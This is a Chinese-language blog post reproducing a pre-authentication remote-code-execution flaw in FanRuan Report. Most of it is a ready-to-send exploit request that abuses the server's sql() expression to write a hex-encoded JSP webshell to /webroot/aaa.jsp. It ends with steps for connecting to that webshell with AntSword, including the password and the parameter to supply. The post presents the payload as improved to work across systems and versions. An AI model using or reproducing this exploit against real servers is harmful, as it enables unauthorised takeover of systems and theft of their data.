[漏洞复现]最新帆软前台getshell漏洞及优化poc

如果觉得该文章有帮助的，麻烦师傅们可以搜索下微信公众号：良月安全。点个关注，感谢师傅们的支持。

前言

昨天看到各个地方都在发帆软的漏洞，看到poc后发现利用姿势应该是之前就有的，并且网上传的poc是写绝对路径，其实传相对路径就可以getshell。所以我们就对poc进行了一些小小的优化：

1、相对路径写入，可利用的环境更广，可无视系统和版本写入。

2、payload较短，直接蚁剑利用。

漏洞复现

漏洞原理y4tacker师傅也在自己的博客做了分享：某软Report高版本中利用的一些细节 (y4tacker.github.io)

我们这边主要对poc进行小小的优化。

GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

发送漏洞poc

漏洞利用成果后，写入文件为/webroot/aaa.jsp

可以利用蚁剑进行连接，添加get参数?a=javax.script.ScriptEngineManager，蚁剑连接密码为b，连接类型选择JSPJS